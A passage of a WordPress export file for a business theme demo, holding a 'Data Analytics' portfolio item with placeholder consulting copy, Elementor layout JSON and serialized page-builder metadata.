Results","header_size":"h5","_padding":{"unit":"px","top":"0","right":"0","bottom":"25","left":"0","isLinked":false}},"elements":[],"widgetType":"heading"},{"id":"417c0abc","elType":"section","settings":{"gap":"no","structure":"20","padding":{"unit":"px","top":"0","right":"0","bottom":"60","left":"0","isLinked":false},"layout":"full_width","reverse_order_tablet":"reverse-tablet","reverse_order_mobile":"reverse-mobile"},"elements":[{"id":"61b88389","elType":"column","settings":{"_column_size":50,"_inline_size":null,"_inline_size_tablet":100},"elements":[{"id":"7526ec0c","elType":"widget","settings":{"editor":"<p>A utility company was steadily losing customers as consumers gained the right to select their energy supplier. To boost loyalty, we helped the company transform its culture to be intensely customer-focused.<\/p><p>We helped a global technology company that specializes in software to reduce the complexity and mystery <span style=\"color: #ff8523;\">around their pricing strategy.<\/span> The work helped generate millions more in income each year. We helped a multibillion dollar global technology giant simplify structures, save millions in costs, and create better-prepared sellers with more time for customers. We helped a multibillion dollar global technology giant simplify organizational structures, save millions in costs.<\/p>","_padding":{"unit":"px","top":"0","right":"42","bottom":"0","left":"0","isLinked":false},"_padding_mobile":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false}},"elements":[],"widgetType":"text-editor"}],"isInner":true},{"id":"2532bca8","elType":"column","settings":{"_column_size":50,"_inline_size":null,"_inline_size_tablet":100},"elements":[{"id":"290658e","elType":"widget","settings":{"image":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/chart-project.png","id":784},"image_size":"full","_margin":{"unit":"px","top":"0","right":"0","bottom":"0","left":"-15","isLinked":false},"_margin_mobile":{"unit":"px","top":"0","right":"0","bottom":"0","left":"0","isLinked":false},"_padding_tablet":{"unit":"px","top":"0","right":"0","bottom":"40","left":"0","isLinked":false}},"elements":[],"widgetType":"image"}],"isInner":true}],"isInner":true},{"id":"2d512bac","elType":"widget","settings":{"social_icon_list":[{"social_icon":{"value":"fab fa-twitter","library":"fa-brands"},"_id":"049712d","item_icon_color":"custom","item_icon_primary_color":"#51AFF7","item_icon_secondary_color":"#FFFFFF"},{"social_icon":{"value":"fab fa-facebook-f","library":"fa-brands"},"_id":"030f11b","item_icon_color":"custom","item_icon_primary_color":"#284BAF","item_icon_secondary_color":"#FFFFFF"},{"social_icon":{"value":"fab fa-google-plus-g","library":"fa-brands"},"_id":"9c6b4b3","item_icon_color":"custom","item_icon_primary_color":"#E03609","item_icon_secondary_color":"#FFFFFF"},{"social_icon":{"value":"fab fa-pinterest-p","library":"fa-brands"},"_id":"b977f7f","item_icon_color":"custom","item_icon_primary_color":"#E40000","item_icon_secondary_color":"#FFFFFF"}],"icon_color":"custom","icon_primary_color":"rgba(26, 26, 26, 0)","icon_secondary_color":"#1A1A1A","icon_size":{"unit":"px","size":14,"sizes":[]},"icon_spacing":{"unit":"px","size":15,"sizes":[]},"image_border_border":"solid","image_border_width":{"unit":"px","top":"1","right":"1","bottom":"1","left":"1","isLinked":true},"image_border_color":"rgba(255, 255, 255, 0)","border_radius":{"unit":"px","top":"50","right":"50","bottom":"50","left":"50","isLinked":true},"hover_border_color":"rgba(255, 255, 255, 0)","columns":"4","align":"right","_padding":{"unit":"px","top":"0","right":"0","bottom":"50","left":"0","isLinked":false}},"elements":[],"widgetType":"social-icons"}],"isInner":false}],"isInner":false}]]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_controls_usage]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:9:{s:11:"text-editor";a:3:{s:5:"count";i:8;s:15:"control_percent";i:1;s:8:"controls";a:2:{s:7:"content";a:1:{s:14:"section_editor";a:2:{s:6:"editor";i:8;s:8:"drop_cap";i:1;}}s:8:"advanced";a:1:{s:14:"_section_style";a:3:{s:15:"_padding_mobile";i:3;s:15:"_padding_tablet";i:1;s:8:"_padding";i:5;}}}}s:6:"column";a:3:{s:5:"count";i:12;s:15:"control_percent";i:0;s:8:"controls";a:1:{s:6:"layout";a:1:{s:6:"layout";a:3:{s:12:"_inline_size";i:12;s:19:"_inline_size_tablet";i:8;s:19:"_inline_size_mobile";i:6;}}}}s:7:"heading";a:3:{s:5:"count";i:7;s:15:"control_percent";i:1;s:8:"controls";a:3:{s:7:"content";a:1:{s:13:"section_title";a:2:{s:5:"title";i:7;s:11:"header_size";i:7;}}s:5:"style";a:1:{s:19:"section_title_style";a:5:{s:11:"title_color";i:4;s:21:"typography_typography";i:4;s:22:"typography_font_family";i:4;s:20:"typography_font_size";i:4;s:22:"typography_font_weight";i:4;}}s:8:"advanced";a:1:{s:14:"_section_style";a:1:{s:8:"_padding";i:7;}}}}s:7:"section";a:3:{s:5:"count";i:6;s:15:"control_percent";i:0;s:8:"controls";a:3:{s:6:"layout";a:2:{s:14:"section_layout";a:3:{s:3:"gap";i:4;s:16:"content_position";i:1;s:6:"layout";i:2;}s:17:"section_structure";a:1:{s:9:"structure";i:4;}}s:5:"style";a:2:{s:18:"section_background";a:2:{s:21:"background_background";i:1;s:16:"background_color";i:1;}s:14:"section_border";a:1:{s:13:"border_radius";i:1;}}s:8:"advanced";a:2:{s:16:"section_advanced";a:2:{s:7:"padding";i:4;s:14:"padding_mobile";i:1;}s:19:"_section_responsive";a:2:{s:20:"reverse_order_tablet";i:1;s:20:"reverse_order_mobile";i:1;}}}}s:5:"image";a:3:{s:5:"count";i:2;s:15:"control_percent";i:2;s:8:"controls";a:3:{s:7:"content";a:1:{s:13:"section_image";a:2:{s:5:"image";i:2;s:10:"image_size";i:2;}}s:5:"style";a:1:{s:19:"section_style_image";a:1:{s:19:"image_border_radius";i:1;}}s:8:"advanced";a:1:{s:14:"_section_style";a:3:{s:7:"_margin";i:1;s:14:"_margin_mobile";i:1;s:15:"_padding_tablet";i:1;}}}}s:9:"icon-list";a:3:{s:5:"count";i:1;s:15:"control_percent";i:3;s:8:"controls";a:3:{s:7:"content";a:1:{s:12:"section_icon";a:1:{s:9:"icon_list";i:1;}}s:5:"style";a:3:{s:17:"section_icon_list";a:1:{s:13:"space_between";i:1;}s:18:"section_icon_style";a:2:{s:10:"icon_color";i:1;s:9:"icon_size";i:1;}s:18:"section_text_style";a:1:{s:11:"text_indent";i:1;}}s:8:"advanced";a:1:{s:14:"_section_style";a:1:{s:8:"_padding";i:1;}}}}s:7:"divider";a:3:{s:5:"count";i:2;s:15:"control_percent";i:1;s:8:"controls";a:1:{s:5:"style";a:1:{s:21:"section_divider_style";a:3:{s:5:"color";i:2;s:3:"gap";i:2;s:10:"gap_mobile";i:1;}}}}s:9:"iprogress";a:3:{s:5:"count";i:4;s:15:"control_percent";i:1;s:8:"controls";a:2:{s:7:"content";a:1:{s:15:"content_section";a:3:{s:9:"bar_style";i:4;s:5:"title";i:4;s:7:"percent";i:4;}}s:8:"advanced";a:1:{s:14:"_section_style";a:2:{s:15:"_padding_tablet";i:2;s:15:"_padding_mobile";i:1;}}}}s:12:"social-icons";a:3:{s:5:"count";i:1;s:15:"control_percent";i:6;s:8:"controls";a:3:{s:7:"content";a:1:{s:19:"section_social_icon";a:3:{s:16:"social_icon_list";i:1;s:7:"columns";i:1;s:5:"align";i:1;}}s:5:"style";a:2:{s:20:"section_social_style";a:9:{s:10:"icon_color";i:1;s:18:"icon_primary_color";i:1;s:20:"icon_secondary_color";i:1;s:9:"icon_size";i:1;s:12:"icon_spacing";i:1;s:19:"image_border_border";i:1;s:18:"image_border_width";i:1;s:18:"image_border_color";i:1;s:13:"border_radius";i:1;}s:20:"section_social_hover";a:1:{s:18:"hover_border_color";i:1;}}s:8:"advanced";a:1:{s:14:"_section_style";a:1:{s:8:"_padding";i:1;}}}}}]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>Data Analytics</title>
		<link>http://wpdemo.archiwp.com/maxbizz/portfolio/data-analytics/</link>
		<pubDate>Fri, 11 Sep 2020 07:08:23 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">http://wpdemo.archiwp.com/maxbizz/?post_type=ot_portfolio&#038;p=826</guid>
		<description></description>
		<content:encoded><![CDATA[<p>Not so long ago, marketing consumer products felt like a genteel game of lawn tennis: Established competitors invested in creative with long lead times, using proven models of TV and big-box retail, alongside trusted agency partners. Today, it’s more like a sprawling contest of mixed martial arts, with new competitors playing by different rules; an unprecedented complexity of channels, content and partners; and a step change in speed and ways of working that has punches flying at incumbent consumer products companies. Within the span of most executives’ careers, advances in technology have reshaped how consumers engage with brands.</p>		
			<h6>Client:</h6>		
		<p>OceanThemes</p>		
			<h6>Website:</h6>		
		<p>oceanthemes.net</p>		
			<h6>Date:</h6>		
		<p>March 26, 2019</p>		
			<h6>Category:</h6>		
		<p>Marketing/Finance</p>		
										<img width="1174" height="620" src="https://maxbizz.s3.amazonaws.com/images/project-details.jpg" alt="" loading="lazy" srcset="https://maxbizz.s3.amazonaws.com/images/project-details.jpg 1174w, https://maxbizz.s3.amazonaws.com/images/project-details-300x158.jpg 300w, https://maxbizz.s3.amazonaws.com/images/project-details-1024x541.jpg 1024w, https://maxbizz.s3.amazonaws.com/images/project-details-768x406.jpg 768w" sizes="(max-width: 1174px) 100vw, 1174px" />											
			<h5>01. Сhallenge</h5>		
		<p>Fueling the blur of combat is a radical shift in brand growth models. Within the span of most executives’ careers, advances in technology have reshaped how consumers engage with brands. In the US and UK, more than 60% of consumers now discover products online, and 85% of millennials trust reviews from a faceless stranger more than traditional advertising. The same technology advances have dramatically altered the competitive landscape.</p>		
					<ul>
							<li>
							<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" id="Capa_1" x="0px" y="0px" viewBox="0 0 29.107 29.107" style="enable-background:new 0 0 29.107 29.107;" xml:space="preserve">
<g>
	<g id="c147_full_moon">
		<g>
			<path d="M14.554,0C6.561,0,0,6.562,0,14.552c0,7.996,6.561,14.555,14.554,14.555c7.996,0,14.553-6.559,14.553-14.555     C29.106,6.562,22.55,0,14.554,0z"></path>
		</g>
	</g>
	<g id="Capa_1_14_">
	</g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
</svg>						
										the organization is just beginning to operate in the market, implementing some projects. Our team of global experts help you achieve sustainable, organic growth by focusing on three critical building blocks.
									</li>
								<li>
							<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" id="Capa_1" x="0px" y="0px" viewBox="0 0 29.107 29.107" style="enable-background:new 0 0 29.107 29.107;" xml:space="preserve">
<g>
	<g id="c147_full_moon">
		<g>
			<path d="M14.554,0C6.561,0,0,6.562,0,14.552c0,7.996,6.561,14.555,14.554,14.555c7.996,0,14.553-6.559,14.553-14.555     C29.106,6.562,22.55,0,14.554,0z"></path>
		</g>
	</g>
	<g id="Capa_1_14_">
	</g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
</svg>						
										there are projects that require temporary expansion of the marketing department. Customer-focused businesses build a virtuous cycle we call the "customer wheel." We help you at every stage of growth, developing custom solutions and collaborating with all levels of your organization.
									</li>
						</ul>
			<h5>02. Solutions</h5>		
		<p>What’s the right path forward? Reinventing the brand growth model requires more than a reallocation of marketing budget to digital. CMOs need a reassessment of growth platforms and future brand portfolios, a new understanding of the consumer journey, a supporting strategy on data and technology. Fueling the blur of combat is a radical shift in brand growth models. Within the span of most executives’ careers, advances in technology have reshaped how consumers engage with brands. In the US and UK, more than 60% of consumers now discover products online, and 85% of millennials trust reviews from a faceless stranger more than traditional advertising. The same technology advances have dramatically altered the competitive landscape.</p>		
					75				
			<h6>marketing analysis</h6>		
					65				
			<h6>business innovation</h6>		
					90				
			<h6>finance strategy</h6>		
					45				
			<h6>corporate management</h6>		
			<h5>03. Results</h5>		
		<p>A utility company was steadily losing customers as consumers gained the right to select their energy supplier. To boost loyalty, we helped the company transform its culture to be intensely customer-focused.</p><p>We helped a global technology company that specializes in software to reduce the complexity and mystery around their pricing strategy. The work helped generate millions more in income each year. We helped a multibillion dollar global technology giant simplify structures, save millions in costs, and create better-prepared sellers with more time for customers. We helped a multibillion dollar global technology giant simplify organizational structures, save millions in costs.</p>		
										<img width="606" height="342" src="https://maxbizz.s3.amazonaws.com/images/chart-project.png" alt="" loading="lazy" srcset="https://maxbizz.s3.amazonaws.com/images/chart-project.png 606w, https://maxbizz.s3.amazonaws.com/images/chart-project-300x169.png 300w" sizes="(max-width: 606px) 100vw, 606px" />											
					<a target="_blank" rel="noopener noreferrer">
						Twitter
											</a>
					<a target="_blank" rel="noopener noreferrer">
						Facebook-f
											</a>
					<a target="_blank" rel="noopener noreferrer">
						Google-plus-g
											</a>
					<a target="_blank" rel="noopener noreferrer">
						Pinterest-p
											</a>]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>826</wp:post_id>
		<wp:post_date><![CDATA[2020-09-11 07:08:23]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-09-11 07:08:23]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[open]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[data-analytics]]></wp:post_name>
		<wp:status><![CDATA[publish]]></wp:status>
		<wp:post_parent>0</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[ot_portfolio]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
										<category domain="portfolio_cat" nicename="startup"><![CDATA[startup]]></category>
		<category domain="portfolio_cat" nicename="strategy"><![CDATA[strategy]]></category>
						<wp:postmeta>
		<wp:meta_key><![CDATA[_edit_last]]></wp:meta_key>
		<wp:meta_value><![CDATA[1]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_thumbnail_id]]></wp:meta_key>
		<wp:meta_value><![CDATA[827]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_page_template]]></wp:meta_key>
		<wp:meta_value><![CDATA[default]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[slide_template]]></wp:meta_key>
		<wp:meta_value><![CDATA[]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[rs_page_bg_color]]></wp:meta_key>
		<wp:meta_value><![CDATA[]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[pheader_switch]]></wp:meta_key>
		<wp:meta_value><![CDATA[1]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_edit_mode]]></wp:meta_key>
		<wp:meta_value><![CDATA[builder]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_template_type]]></wp:meta_key>
		<wp:meta_value><![CDATA[wp-post]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_version]]></wp:meta_key>
		<wp:meta_value><![CDATA[3.0.10]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_data]]></wp:meta_key>
		<wp:meta_value><![CDATA[[{"id":"4ff3a9c5","elType":"section","settings":{"gap":"extended","content_position":"bottom","structure":"20","padding":{"unit":"px","top":"80","right":"0","bottom":"50","left":"0","isLinked":false}},"elements":[{"id":"41414446","elType":"column","settings":{"_column_size":50,"_inline_size":65,"_inline_size_tablet":100},"elements":[{"id":"7cea63e4","elType":"widget","settings":{"editor":"<p>Not so long ago, marketing consumer products felt like a genteel game of lawn tennis: Established competitors invested in creative with long lead times, using proven models of TV and big-box retail, alongside trusted agency partners. Today, it\u2019s more like a sprawling contest of mixed martial arts, with new competitors playing by different rules; an unprecedented complexity of channels, content and partners; and a step change in speed and ways of working that has punches flying at incumbent consumer products companies. Within the span of most executives\u2019 careers, advances in technology have reshaped how consumers engage with brands.<\/p>","drop_cap":"yes","_padding_mobile":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false},"_padding_tablet":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false}},"elements":[],"widgetType":"text-editor"}],"isInner":false},{"id":"17a99080","elType":"column","settings":{"_column_size":50,"_inline_size":35,"_inline_size_tablet":100},"elements":[{"id":"277d3a66","elType":"section","settings":{"gap":"extended","structure":"20","background_background":"classic","background_color":"#F5F5F5","border_radius":{"unit":"px","top":"5","right":"5","bottom":"5","left":"5","isLinked":true},"padding":{"unit":"px","top":"35","right":"20","bottom":"35","left":"20","isLinked":false},"padding_mobile":{"unit":"px","top":"15","right":"15","bottom":"15","left":"15","isLinked":true}},"elements":[{"id":"731b7798","elType":"column","settings":{"_column_size":50,"_inline_size":47.8130000000000023874235921539366245269775390625,"_inline_size_mobile":100},"elements":[{"id":"1ccb559a","elType":"widget","settings":{"title":"Client:","header_size":"h6","title_color":"#1B1D21","typography_typography":"custom","typography_font_family":"Inter","typography_font_size":{"unit":"px","size":16,"sizes":[]},"typography_font_weight":"bold","_padding":{"unit":"px","top":"0","right":"0","bottom":"3","left":"0","isLinked":false}},"elements":[],"widgetType":"heading"},{"id":"889c447","elType":"widget","settings":{"editor":"<p>OceanThemes<\/p>","_padding":{"unit":"px","top":"0","right":"0","bottom":"28","left":"0","isLinked":false}},"elements":[],"widgetType":"text-editor"},{"id":"27258f6a","elType":"widget","settings":{"title":"Website:","header_size":"h6","title_color":"#1B1D21","typography_typography":"custom","typography_font_family":"Inter","typography_font_size":{"unit":"px","size":16,"sizes":[]},"typography_font_weight":"bold","_padding":{"unit":"px","top":"0","right":"0","bottom":"3","left":"0","isLinked":false}},"elements":[],"widgetType":"heading"},{"id":"5c1d64ba","elType":"widget","settings":{"editor":"<p>oceanthemes.net<\/p>","_padding_mobile":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false}},"elements":[],"widgetType":"text-editor"}],"isInner":true},{"id":"677ece23","elType":"column","settings":{"_column_size":50,"_inline_size":52.1820000000000021600499167107045650482177734375,"_inline_size_mobile":100},"elements":[{"id":"427fc382","elType":"widget","settings":{"title":"Date:","header_size":"h6","title_color":"#1B1D21","typography_typography":"custom","typography_font_family":"Inter","typography_font_size":{"unit":"px","size":16,"sizes":[]},"typography_font_weight":"bold","_padding":{"unit":"px","top":"0","right":"0","bottom":"3","left":"0","isLinked":false}},"elements":[],"widgetType":"heading"},{"id":"6b572066","elType":"widget","settings":{"editor":"<p>March 26, 2019<\/p>","_padding":{"unit":"px","top":"0","right":"0","bottom":"28","left":"0","isLinked":false}},"elements":[],"widgetType":"text-editor"},{"id":"18475bca","elType":"widget","settings":{"title":"Category:","header_size":"h6","title_color":"#1B1D21","typography_typography":"custom","typography_font_family":"Inter","typography_font_size":{"unit":"px","size":16,"sizes":[]},"typography_font_weight":"bold","_padding":{"unit":"px","top":"0","right":"0","bottom":"3","left":"0","isLinked":false}},"elements":[],"widgetType":"heading"},{"id":"9fa30e6","elType":"widget","settings":{"editor":"<p>Marketing\/Finance<\/p>"},"elements":[],"widgetType":"text-editor"}],"isInner":true}],"isInner":true}],"isInner":false}],"isInner":false},{"id":"44bd3c29","elType":"section","settings":{"padding":{"unit":"px","top":"0","right":"0","bottom":"45","left":"0","isLinked":false}},"elements":[{"id":"4348fe38","elType":"column","settings":{"_column_size":100,"_inline_size":null},"elements":[{"id":"5fa0d94e","elType":"widget","settings":{"image":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/project-details.jpg","id":780},"image_size":"full","image_border_radius":{"unit":"px","top":"5","right":"5","bottom":"5","left":"5","isLinked":true}},"elements":[],"widgetType":"image"}],"isInner":false}],"isInner":false},{"id":"1d4f8f11","elType":"section","settings":[],"elements":[{"id":"1f4ea130","elType":"column","settings":{"_column_size":100,"_inline_size":null},"elements":[{"id":"5ad9d3cc","elType":"widget","settings":{"title":"<span style=\"color:#ff8523\">01.<\/span> \u0421hallenge","header_size":"h5","_padding":{"unit":"px","top":"0","right":"0","bottom":"25","left":"0","isLinked":false}},"elements":[],"widgetType":"heading"},{"id":"556a2b5e","elType":"widget","settings":{"editor":"<p>Fueling the blur of combat is a radical shift in brand growth models. Within the span of most executives\u2019 careers, advances in technology have reshaped how consumers engage with brands. In the US and UK, more than 60% of consumers now discover products online, and 85% of millennials trust reviews from a faceless stranger more than traditional advertising. <span style=\"color: #1b1d21; font-weight: 600;\">The same technology advances have dramatically <\/span>altered the competitive landscape.<\/p>","_padding":{"unit":"px","top":"0","right":"0","bottom":"24","left":"0","isLinked":false}},"elements":[],"widgetType":"text-editor"},{"id":"55a93ca5","elType":"widget","settings":{"icon_list":[{"text":"<span style=\"color:#262832; font-weight:600;\">the organization is just beginning to operate<\/span> in the market, implementing some projects. Our team of global experts help you achieve sustainable, organic growth by focusing on three critical building blocks.","selected_icon":{"value":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/black-circle.svg","id":782},"library":"svg"},"_id":"b098382"},{"text":"<span style=\"color:#262832; font-weight:600;\">there are projects that require temporary expansion<\/span> of the marketing department. Customer-focused businesses build a virtuous cycle we call the \"customer wheel.\" We help you at every stage of growth, developing custom solutions and collaborating with all levels of your organization.","selected_icon":{"value":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/black-circle.svg","id":782},"library":"svg"},"_id":"7ebdebe"}],"space_between":{"unit":"px","size":17,"sizes":[]},"icon_color":"#FF8523","icon_size":{"unit":"px","size":6,"sizes":[]},"text_indent":{"unit":"px","size":14,"sizes":[]},"_padding":{"unit":"px","top":"0","right":"0","bottom":"0","left":"19","isLinked":false}},"elements":[],"widgetType":"icon-list"},{"id":"5abf57a3","elType":"widget","settings":{"text":"Divider","color":"#0000001A","gap":{"unit":"px","size":45,"sizes":[]},"gap_mobile":{"unit":"px","size":30,"sizes":[]}},"elements":[],"widgetType":"divider"},{"id":"57e01cb7","elType":"widget","settings":{"title":"<span style=\"color:#ff8523\">02.<\/span> Solutions","header_size":"h5","_padding":{"unit":"px","top":"0","right":"0","bottom":"25","left":"0","isLinked":false}},"elements":[],"widgetType":"heading"},{"id":"5baa95cc","elType":"widget","settings":{"editor":"<p>What\u2019s the right path forward? Reinventing the brand growth model requires more than a reallocation of marketing budget to digital. CMOs need a reassessment of growth platforms and future brand portfolios, a new understanding of the consumer journey, a supporting strategy on data and technology. Fueling the blur of combat is a radical shift in brand growth models. Within the span of most executives\u2019 careers, advances in technology have reshaped how consumers engage with brands. In the US and UK, more than 60% of consumers now discover products online, and 85% of millennials trust reviews from a faceless stranger more than traditional advertising. <span style=\"color: #1b1d21; font-weight: 600;\">The same technology advances have dramatically <\/span>altered the competitive landscape.<\/p>","_padding":{"unit":"px","top":"0","right":"0","bottom":"24","left":"0","isLinked":false}},"elements":[],"widgetType":"text-editor"},{"id":"1dba1bbb","elType":"section","settings":{"layout":"full_width","gap":"extended","structure":"40"},"elements":[{"id":"38f5d8d2","elType":"column","settings":{"_column_size":25,"_inline_size":null,"_inline_size_mobile":100,"_inline_size_tablet":50},"elements":[{"id":"5f3475fd","elType":"widget","settings":{"bar_style":"circle","title":"marketing analysis","percent":{"unit":"%","size":75,"sizes":[]},"_padding_tablet":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false}},"elements":[],"widgetType":"iprogress"}],"isInner":true},{"id":"6d38de89","elType":"column","settings":{"_column_size":25,"_inline_size":null,"_inline_size_mobile":100,"_inline_size_tablet":50},"elements":[{"id":"4808bf6f","elType":"widget","settings":{"bar_style":"circle","title":"business innovation","percent":{"unit":"%","size":65,"sizes":[]},"_padding_tablet":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false}},"elements":[],"widgetType":"iprogress"}],"isInner":true},{"id":"71a89d74","elType":"column","settings":{"_column_size":25,"_inline_size":null,"_inline_size_mobile":100,"_inline_size_tablet":50},"elements":[{"id":"4dbaf8d2","elType":"widget","settings":{"bar_style":"circle","title":"finance strategy","percent":{"unit":"%","size":90,"sizes":[]},"_padding_mobile":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false}},"elements":[],"widgetType":"iprogress"}],"isInner":true},{"id":"3a570071","elType":"column","settings":{"_column_size":25,"_inline_size":null,"_inline_size_mobile":100,"_inline_size_tablet":50},"elements":[{"id":"73034e72","elType":"widget","settings":{"bar_style":"circle","title":"corporate management","percent":{"unit":"%","size":45,"sizes":[]}},"elements":[],"widgetType":"iprogress"}],"isInner":true}],"isInner":true},{"id":"dedeeb","elType":"widget","settings":{"text":"Divider","color":"#0000001A","gap":{"unit":"px","size":35,"sizes":[]}},"elements":[],"widgetType":"divider"},{"id":"6001db98","elType":"widget","settings":{"title":"<span style=\"color:#ff8523\">03.<\/span> Results","header_size":"h5","_padding":{"unit":"px","top":"0","right":"0","bottom":"25","left":"0","isLinked":false}},"elements":[],"widgetType":"heading"},{"id":"55e195cf","elType":"section","settings":{"gap":"no","structure":"20","padding":{"unit":"px","top":"0","right":"0","bottom":"60","left":"0","isLinked":false},"layout":"full_width","reverse_order_tablet":"reverse-tablet","reverse_order_mobile":"reverse-mobile"},"elements":[{"id":"7b86f241","elType":"column","settings":{"_column_size":50,"_inline_size":null,"_inline_size_tablet":100},"elements":[{"id":"3b4a0d62","elType":"widget","settings":{"editor":"<p>A utility company was steadily losing customers as consumers gained the right to select their energy supplier. To boost loyalty, we helped the company transform its culture to be intensely customer-focused.<\/p><p>We helped a global technology company that specializes in software to reduce the complexity and mystery <span style=\"color: #ff8523;\">around their pricing strategy.<\/span> The work helped generate millions more in income each year. We helped a multibillion dollar global technology giant simplify structures, save millions in costs, and create better-prepared sellers with more time for customers. We helped a multibillion dollar global technology giant simplify organizational structures, save millions in costs.<\/p>","_padding":{"unit":"px","top":"0","right":"42","bottom":"0","left":"0","isLinked":false},"_padding_mobile":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false}},"elements":[],"widgetType":"text-editor"}],"isInner":true},{"id":"59c6530d","elType":"column","settings":{"_column_size":50,"_inline_size":null,"_inline_size_tablet":100},"elements":[{"id":"628bc6f7","elType":"widget","settings":{"image":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/chart-project.png","id":784},"image_size":"full","_margin":{"unit":"px","top":"0","right":"0","bottom":"0","left":"-15","isLinked":false},"_margin_mobile":{"unit":"px","top":"0","right":"0","bottom":"0","left":"0","isLinked":false},"_padding_tablet":{"unit":"px","top":"0","right":"0","bottom":"40","left":"0","isLinked":false}},"elements":[],"widgetType":"image"}],"isInner":true}],"isInner":true},{"id":"4bf58a8f","elType":"widget","settings":{"social_icon_list":[{"social_icon":{"value":"fab fa-twitter","library":"fa-brands"},"_id":"049712d","item_icon_color":"custom","item_icon_primary_color":"#51AFF7","item_icon_secondary_color":"#FFFFFF"},{"social_icon":{"value":"fab fa-facebook-f","library":"fa-brands"},"_id":"030f11b","item_icon_color":"custom","item_icon_primary_color":"#284BAF","item_icon_secondary_color":"#FFFFFF"},{"social_icon":{"value":"fab fa-google-plus-g","library":"fa-brands"},"_id":"9c6b4b3","item_icon_color":"custom","item_icon_primary_color":"#E03609","item_icon_secondary_color":"#FFFFFF"},{"social_icon":{"value":"fab fa-pinterest-p","library":"fa-brands"},"_id":"b977f7f","item_icon_color":"custom","item_icon_primary_color":"#E40000","item_icon_secondary_color":"#FFFFFF"}],"icon_color":"custom","icon_primary_color":"rgba(26, 26, 26, 0)","icon_secondary_color":"#1A1A1A","icon_size":{"unit":"px","size":14,"sizes":[]},"icon_spacing":{"unit":"px","size":15,"sizes":[]},"image_border_border":"solid","image_border_width":{"unit":"px","top":"1","right":"1","bottom":"1","left":"1","isLinked":true},"image_border_color":"rgba(255, 255, 255, 0)","border_radius":{"unit":"px","top":"50","right":"50","bottom":"50","left":"50","isLinked":true},"hover_border_color":"rgba(255, 255, 255, 0)","columns":"4","align":"right","_padding":{"unit":"px","top":"0","right":"0","bottom":"50","left":"0","isLinked":false}},"elements":[],"widgetType":"social-icons"}],"isInner":false}],"isInner":false}]]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[pheader_bg_image]]></wp:meta_key>
		<wp:meta_value><![CDATA[774]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[slide_img]]></wp:meta_key>
		<wp:meta_value><![CDATA[835]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_controls_usage]]></wp:meta_key>
